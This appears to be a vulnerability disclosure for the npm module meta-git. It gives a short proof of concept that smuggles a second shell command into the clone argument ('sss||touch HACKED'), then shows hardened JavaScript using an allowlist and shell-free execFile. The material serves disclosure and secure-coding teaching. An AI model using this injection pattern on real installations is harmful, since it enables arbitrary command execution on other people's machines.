The meta-git module is vulnerable to command injection because user-supplied input is concatenated into a command that is executed without validation.
```bash
mkdir tests
cd tests
touch test
touch secret
touch files
```

```bash
npm i meta-git -g  # Install affected module
meta-git clone 'sss||touch HACKED'  # *HACKED* file is created
```
HACKED has been created
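The concatenation flaw described above, contrasted with a hardened form, as an added example that is not meta-git's own code. The function names, the allowlist pattern and the stand-in child process are assumptions made for illustration.

```javascript
const { execFileSync } = require('node:child_process');

// Vulnerable pattern (shown for contrast only, never executed here):
//   exec('git clone ' + repoUrl);
// A shell parses the whole string, so `||`, `;` or `$(...)` inside repoUrl
// become shell syntax instead of data.

// Assumed policy: characters commonly found in git URLs and scp-style paths.
const SAFE_REPO = /^[A-Za-z0-9@:\/._~+-]+$/;

// Hypothetical validator: rejects empty, option-like and non-allowlisted input.
function validateRepoArg(repoUrl) {
  if (typeof repoUrl !== 'string' || repoUrl.length === 0) {
    throw new TypeError('repository must be a non-empty string');
  }
  if (repoUrl.startsWith('-')) {
    throw new Error('repository must not look like a command-line option');
  }
  if (!SAFE_REPO.test(repoUrl)) {
    throw new Error('repository contains characters outside the allowlist');
  }
  return repoUrl;
}

// Argument vector meant for execFile('git', argv): no shell is involved, each
// element reaches the program as one argument, and `--` ends option parsing.
function buildCloneArgv(repoUrl) {
  return ['clone', '--', validateRepoArg(repoUrl)];
}

// Stand-in for the real program so the example runs offline: a child Node
// process started WITHOUT a shell reports the arguments it received.
function argvSeenByChild(args) {
  const script = 'console.log(JSON.stringify(process.argv))';
  const out = execFileSync(process.execPath, ['-e', script, ...args], {
    encoding: 'utf8',
  });
  return JSON.parse(out).slice(-args.length);
}

// The string from the report arrives as one literal argument, not as shell syntax.
console.log(argvSeenByChild(['clone', 'sss||touch HACKED']));
```

Validation and shell-free execution are independent layers: the argument array alone stops the shell from interpreting the input, and the allowlist additionally rejects it before any process is started.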